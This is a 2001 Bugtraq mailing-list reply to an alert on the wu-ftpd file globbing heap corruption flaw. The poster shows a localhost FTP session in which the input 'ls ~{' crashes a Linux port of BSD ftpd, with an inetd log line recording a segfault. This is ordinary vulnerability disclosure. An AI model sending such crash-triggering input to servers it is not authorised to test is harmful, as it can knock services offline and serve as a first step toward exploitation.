[23295] in bugtraq
Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
daemon@ATHENA.MIT.EDU (script0r)
Wed Nov 28 19:55:43 2001
Message-ID: <35684.24.51.95.122.1006990579.squirrel@mail.axenet.org>
Date: Wed, 28 Nov 2001 18:36:19 -0500 (EST)
From: "script0r" <script0r@axenet.org>
To: <bugtraq@securityfocus.com>
In-Reply-To: <Pine.GSO.4.30.0111280946160.20852-100000@mail.securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
>
> --------------------------------------------------------------------------
-
> Security Alert
>
> Subject: Wu-Ftpd File Globbing Heap Corruption Vulnerability
> BUGTRAQ ID: 3581 CVE ID: CVE-MAP-NOMATCH
> Published: Nov 27, 2001 Updated: Nov 28, 2001
> 01:12:56
>
> Remote: Yes Local: No
> Availability: Always Authentication: Not Required
> Credibility: Vendor Confirmed Ease: No Exploit
> Available Class: Failure to Handle Exceptional Conditions
>
> Impact: 10.0 Severity: 10.0 Urgency: 8.2
>
> Last Change: Initial analysis.
> --------------------------------------------------------------------------
I am running the a linux port of the bsd ftpd and it might be vulnerable to
a similar attack,
ftp localhost
Connected to localhost.
220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
Name (localhost:user): ftp
331 Guest login ok, type your name as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection
in inetd I find an error stating that the ftpd process has died unexpectedly
Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11
